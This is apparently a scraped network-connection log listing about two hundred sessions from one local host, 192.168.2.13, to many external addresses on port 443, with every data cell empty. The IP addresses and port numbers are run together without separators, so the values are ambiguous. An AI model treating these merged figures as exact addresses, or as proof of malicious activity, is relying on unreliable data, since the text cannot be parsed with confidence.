                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13682192.168.2.133534659.144.121.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13683192.168.2.1345992120.181.29.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13684192.168.2.1356778221.47.128.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13685192.168.2.134107432.222.210.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13686192.168.2.1352370125.110.108.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13687192.168.2.1359720148.163.96.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13688192.168.2.1335052153.6.179.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13689192.168.2.1355704139.178.104.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13690192.168.2.1358618134.86.190.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13691192.168.2.1352200125.193.70.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13692192.168.2.134259618.137.35.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13693192.168.2.133699487.21.222.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13694192.168.2.134563262.48.223.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13695192.168.2.1351594135.167.178.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13696192.168.2.13453709.153.183.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13697192.168.2.1358336113.178.236.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13698192.168.2.1339960159.227.156.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13699192.168.2.1344108132.157.129.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13700192.168.2.1345834174.193.238.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13701192.168.2.134570846.150.58.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13702192.168.2.1342604103.195.169.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13703192.168.2.1355606121.86.89.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13704192.168.2.1335364179.83.96.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13705192.168.2.1347098134.245.0.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13706192.168.2.133407477.191.113.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13707192.168.2.13359085.217.102.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13708192.168.2.135583865.99.172.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13709192.168.2.134198647.219.89.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13710192.168.2.133950684.73.231.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13711192.168.2.134071024.67.97.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13712192.168.2.133721497.1.186.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13713192.168.2.1355150150.176.159.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13714192.168.2.1343414158.246.96.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13715192.168.2.1337468221.166.113.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13716192.168.2.134738048.253.146.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13717192.168.2.1350824160.205.10.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13718192.168.2.135552449.163.63.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13719192.168.2.1349410203.81.160.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13720192.168.2.1359034109.51.255.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13721192.168.2.134623477.24.237.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13722192.168.2.133390087.98.250.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13723192.168.2.1359122131.72.230.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13724192.168.2.1347784181.96.228.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13725192.168.2.1333568191.76.23.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13726192.168.2.1351378216.55.252.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13727192.168.2.13361089.19.188.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13728192.168.2.133854057.120.4.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13729192.168.2.1339708125.20.80.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13730192.168.2.1334504134.237.245.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13731192.168.2.1354588100.249.51.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13732192.168.2.13475009.202.66.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13733192.168.2.135153478.149.79.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13734192.168.2.135323294.252.50.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13735192.168.2.1357952221.194.30.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13736192.168.2.135642650.213.148.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13737192.168.2.1352258143.247.11.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13738192.168.2.1341174146.116.182.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13739192.168.2.1334424202.152.109.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13740192.168.2.134359865.157.51.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13741192.168.2.135417281.199.110.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13742192.168.2.1357666195.53.18.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13743192.168.2.133713299.39.92.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13744192.168.2.1333836211.247.212.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13745192.168.2.1336858208.94.83.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13746192.168.2.1346552150.32.8.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13747192.168.2.135006036.118.207.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13748192.168.2.135514450.74.139.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13749192.168.2.1340462205.62.97.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13750192.168.2.133281443.4.193.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13751192.168.2.133775253.76.33.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13752192.168.2.134635689.235.184.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13753192.168.2.1342456172.65.57.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13754192.168.2.1336902113.194.215.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13755192.168.2.1340810142.6.62.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13756192.168.2.1360122183.97.3.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13757192.168.2.1345506131.183.253.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13758192.168.2.135703870.228.142.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13759192.168.2.135775851.58.153.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13760192.168.2.1334656219.230.34.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13761192.168.2.133440243.53.211.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13762192.168.2.1356714143.43.239.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13763192.168.2.135148231.16.209.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13764192.168.2.1339082152.60.97.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13765192.168.2.134888078.38.196.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13766192.168.2.1343868107.228.168.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13767192.168.2.135407666.5.194.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13768192.168.2.1349412200.175.182.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13769192.168.2.1346650183.12.226.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13770192.168.2.1347656142.224.181.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13771192.168.2.1352096146.205.108.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13772192.168.2.1359406173.175.196.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13773192.168.2.133473236.15.247.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13774192.168.2.1338596183.151.197.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13775192.168.2.13552325.173.114.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13776192.168.2.133463854.14.234.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13777192.168.2.1340936148.85.122.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13778192.168.2.1352480176.188.41.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13779192.168.2.1341498148.109.237.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13780192.168.2.1352014205.98.134.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13781192.168.2.134456046.234.19.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13782192.168.2.1336884148.225.111.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13783192.168.2.1334064155.103.243.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13784192.168.2.133760670.197.92.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13785192.168.2.1343036166.13.204.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13786192.168.2.135971635.11.66.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13787192.168.2.1333582126.106.174.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13788192.168.2.134317020.211.237.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13789192.168.2.1333832194.90.124.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13790192.168.2.1337118190.190.159.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13791192.168.2.1346386136.21.131.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13792192.168.2.1354550166.114.23.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13793192.168.2.1345016143.20.244.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13794192.168.2.1358074100.180.45.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13795192.168.2.1337086221.89.47.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13796192.168.2.1335830195.119.75.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13797192.168.2.134900496.183.59.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13798192.168.2.1354208117.104.97.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13799192.168.2.1334288105.63.200.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13800192.168.2.133865441.236.58.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13801192.168.2.13402289.50.56.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13802192.168.2.133596060.237.202.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13803192.168.2.1335554207.87.18.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13804192.168.2.1333294122.4.136.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13805192.168.2.135920023.41.204.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13806192.168.2.133425619.41.240.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13807192.168.2.1356232189.226.119.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13808192.168.2.135305275.30.194.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13809192.168.2.1352216110.112.185.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13810192.168.2.1351498118.221.231.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13811192.168.2.1352184159.115.199.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13812192.168.2.1360948141.93.43.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13813192.168.2.1353844207.126.169.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13814192.168.2.133365044.214.8.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13815192.168.2.133875089.95.186.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13816192.168.2.133817270.84.128.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13817192.168.2.1343706116.254.113.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13818192.168.2.134602437.225.207.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13819192.168.2.133297441.72.193.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13820192.168.2.133308670.39.187.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13821192.168.2.1336380116.216.209.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13822192.168.2.1353652176.176.144.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13823192.168.2.1354780118.85.120.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13824192.168.2.1346390168.245.129.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13825192.168.2.135415827.32.178.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13826192.168.2.133829271.101.28.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13827192.168.2.1340704183.90.8.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13828192.168.2.1333684149.252.212.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13829192.168.2.1348464142.235.78.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13830192.168.2.1347936223.192.47.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13831192.168.2.134103270.92.172.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13832192.168.2.1347592209.251.242.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13833192.168.2.1347754141.90.128.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13834192.168.2.1348638203.38.120.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13835192.168.2.1357356197.171.16.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13836192.168.2.134542231.115.40.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13837192.168.2.1344232140.22.160.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13838192.168.2.134393242.101.236.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13839192.168.2.134233462.226.110.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13840192.168.2.1345100149.169.115.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13841192.168.2.13344684.157.204.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13842192.168.2.133780238.213.108.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13843192.168.2.1337960111.213.111.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13844192.168.2.133467263.103.68.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13845192.168.2.1355622212.191.167.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13846192.168.2.13391585.244.79.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13847192.168.2.134324695.38.142.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13848192.168.2.1351550107.99.200.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13849192.168.2.134556618.123.34.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13850192.168.2.1341770200.38.165.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13851192.168.2.1336542193.133.199.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13852192.168.2.1343304138.48.3.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13853192.168.2.134797673.57.127.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13854192.168.2.1352056208.190.36.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13855192.168.2.1359344202.115.242.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13856192.168.2.1340408135.159.60.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13857192.168.2.1346576164.160.32.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13858192.168.2.135539251.137.89.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13859192.168.2.133483685.224.90.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13860192.168.2.1352956131.197.167.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13861192.168.2.1344850193.81.103.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13862192.168.2.1344050119.11.85.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13863192.168.2.133605452.147.67.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13864192.168.2.134685672.183.52.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13865192.168.2.1333474155.215.39.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13866192.168.2.1352702163.184.49.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13867192.168.2.1339864181.61.177.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13868192.168.2.1354078165.174.171.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13869192.168.2.135463445.205.219.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13870192.168.2.13356129.66.208.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13871192.168.2.1334898203.196.194.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13872192.168.2.1333844185.148.153.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13873192.168.2.135357244.243.167.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13874192.168.2.1355350186.200.14.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13875192.168.2.1359998111.165.131.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13876192.168.2.1334670182.72.235.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13877192.168.2.134460087.93.142.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13878192.168.2.1338706141.204.230.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13879192.168.2.1351438149.169.56.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13880192.168.2.1359256185.189.225.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13881192.168.2.135814280.167.96.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13882192.168.2.1338306208.77.66.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13883192.168.2.134603285.38.66.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13884192.168.2.1348450113.89.76.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13885192.168.2.1356290184.232.213.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13886192.168.2.134098059.148.159.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13887192.168.2.134232887.228.231.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13888192.168.2.1333394218.166.33.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13889192.168.2.1360246153.166.14.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13890192.168.2.134675897.174.26.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13891192.168.2.1344016113.205.33.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13892192.168.2.1360574223.89.219.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13893192.168.2.13416484.32.87.44443
                                                  TimestampBytes transferredDirectionData


